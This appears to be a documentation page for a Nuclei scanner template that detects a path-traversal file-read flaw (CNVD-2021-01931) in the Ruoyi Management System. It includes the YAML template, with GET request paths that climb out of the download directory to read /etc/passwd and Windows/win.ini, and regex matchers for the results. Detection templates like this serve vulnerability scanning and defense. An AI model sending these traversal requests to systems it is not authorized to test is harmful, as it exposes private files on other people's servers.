Ruoyi Management System - Local File Inclusion
ID: CNVD-2021-01931
Severity: high
Author: daffainfo,ritikchaddha
Tags: cnvd,cnvd2021,ruoyi,lfi
Description
Section titled “Description”The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
YAML Source
Section titled “YAML Source”id: CNVD-2021-01931
info: name: Ruoyi Management System - Local File Inclusion author: daffainfo,ritikchaddha severity: high description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system. reference: - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 metadata: max-request: 2 tags: cnvd,cnvd2021,ruoyi,lfi
http: - method: GET path: - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd" - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"
matchers-condition: or matchers: - type: regex part: body regex: - "root:.*:0:0"
- type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and# digest: 4a0a0047304502210080b6cdbdb771c0121ca2d9d0b45e496cd20f81d326f507c61f688ed10ebae6870220264d7686cd156faecd9e15a04bd2435e30c200828b69cf14f63757aa5cf53d3c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cnvd/2021/CNVD-2021-01931.yaml"